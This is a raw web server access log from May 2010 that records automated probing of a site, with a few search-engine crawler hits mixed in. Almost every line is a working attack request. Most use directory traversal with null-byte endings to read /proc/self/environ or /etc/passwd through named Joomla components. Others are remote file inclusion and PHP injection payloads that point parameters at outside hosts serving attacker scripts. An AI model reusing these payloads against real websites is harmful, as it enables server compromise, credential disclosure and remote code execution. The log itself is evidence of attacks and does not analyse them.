94.23.20.123 - - [31/May/2010:07:18:57 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.20.123 - - [31/May/2010:07:18:57 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
76.12.58.212 - - [31/May/2010:07:20:09 -0500] "GET /logs/access_log.1274227200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:20:09 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:20:09 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:22:52 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:22:52 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:22:52 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:22:52 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:23:13 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:07:23:20 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
192.167.114.31 - - [31/May/2010:07:23:42 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
192.167.114.31 - - [31/May/2010:07:23:42 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
67.227.143.132 - - [31/May/2010:07:23:44 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:07:23:44 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:07:23:44 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:07:23:45 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:24:27 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:24:27 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:24:27 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.195.112.180 - - [31/May/2010:07:25:12 -0500] "GET /logs/access_log.1242000000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
92.241.190.214 - - [31/May/2010:07:25:31 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
92.241.190.214 - - [31/May/2010:07:25:31 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
92.241.190.214 - - [31/May/2010:07:25:32 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
76.12.58.212 - - [31/May/2010:07:27:25 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
69.175.14.66 - - [31/May/2010:07:27:26 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.14.66 - - [31/May/2010:07:27:26 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.175.14.66 - - [31/May/2010:07:27:26 -0500] "GET /logs/access_log.1271548800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:07:27:33 -0500] "GET /logs//includes/fotools.php?imgs_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:07:27:33 -0500] "GET //includes/fotools.php?imgs_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:07:27:34 -0500] "GET /logs/access_log.1271980800//includes/fotools.php?imgs_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.55.43.66 - - [31/May/2010:07:28:11 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:07:28:11 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
91.121.201.191 - - [31/May/2010:07:28:33 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:07:28:33 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:07:28:34 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
95.211.18.156 - - [31/May/2010:07:28:36 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:07:28:36 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:07:29:35 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.55.43.66 - - [31/May/2010:07:29:57 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
218.146.255.196 - - [31/May/2010:07:30:33 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.204.229 - - [31/May/2010:07:30:56 -0500] "GET /logs/access_log.1160524800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.227.143.132 - - [31/May/2010:07:32:39 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:07:32:39 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:07:32:39 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
211.19.31.123 - - [31/May/2010:07:32:46 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.19.31.123 - - [31/May/2010:07:32:46 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.19.31.123 - - [31/May/2010:07:33:17 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.19.31.123 - - [31/May/2010:07:33:17 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.199.50 - - [31/May/2010:07:33:26 -0500] "GET /logs/access_log.1236038400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [31/May/2010:07:34:22 -0500] "GET /logs/access_log.1208131200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.227.143.132 - - [31/May/2010:07:35:00 -0500] "GET /logs/access_log.1274227200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:07:35:00 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:07:35:00 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:07:35:59 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:07:35:59 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:07:35:59 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:36:06 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:36:07 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:07:36:13 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:07:36:13 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:07:36:13 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:07:36:41 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:07:36:41 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:07:36:49 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
60.50.211.11 - - [31/May/2010:07:36:56 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
60.50.211.11 - - [31/May/2010:07:36:57 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:07:37:08 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:07:37:08 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:07:37:09 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.55.43.66 - - [31/May/2010:07:37:25 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:07:37:59 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:38:16 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:07:38:16 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
207.46.199.179 - - [31/May/2010:07:38:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.146.255.196 - - [31/May/2010:07:38:42 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.146.255.196 - - [31/May/2010:07:38:42 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.146.255.196 - - [31/May/2010:07:38:43 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:07:40:09 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:07:40:09 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:07:40:09 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.227.143.132 - - [31/May/2010:07:41:06 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:07:41:06 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
95.211.18.156 - - [31/May/2010:07:41:42 -0500] "GET /logs/access_log.1274313600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.55.43.66 - - [31/May/2010:07:41:58 -0500] "GET /logs/access_log.1274313600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
211.19.31.123 - - [31/May/2010:07:42:17 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:07:42:28 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:07:42:28 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.19.31.123 - - [31/May/2010:07:42:30 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
218.146.255.196 - - [31/May/2010:07:42:47 -0500] "GET /logs/access_log.1274313600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
216.105.40.177 - - [31/May/2010:07:43:14 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""WebRingChecker/1.71 LWP/5.79"
95.211.18.156 - - [31/May/2010:07:44:15 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.55.43.66 - - [31/May/2010:07:44:25 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
218.146.255.196 - - [31/May/2010:07:46:57 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.23.11.114 - - [31/May/2010:07:48:11 -0500] "GET /logs/access_log.1271980800///?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
94.23.11.114 - - [31/May/2010:07:48:11 -0500] "GET ///?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
94.23.11.114 - - [31/May/2010:07:48:11 -0500] "GET /logs///?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 7676 "-""Mozilla/5.0"
208.94.110.40 - - [31/May/2010:07:50:58 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.prepressx.com/jack/idscanku1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.94.110.40 - - [31/May/2010:07:50:58 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.prepressx.com/jack/idscanku1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
208.94.110.40 - - [31/May/2010:07:50:58 -0500] "GET /logs/access_log.1271548800/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.prepressx.com/jack/idscanku1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
174.121.162.252 - - [31/May/2010:07:53:21 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=/../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
174.121.162.252 - - [31/May/2010:07:53:21 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=/../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
74.55.43.66 - - [31/May/2010:07:53:40 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:07:53:40 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.43.66 - - [31/May/2010:07:53:40 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
95.211.18.156 - - [31/May/2010:07:53:41 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:07:53:41 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
95.211.18.156 - - [31/May/2010:07:53:41 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
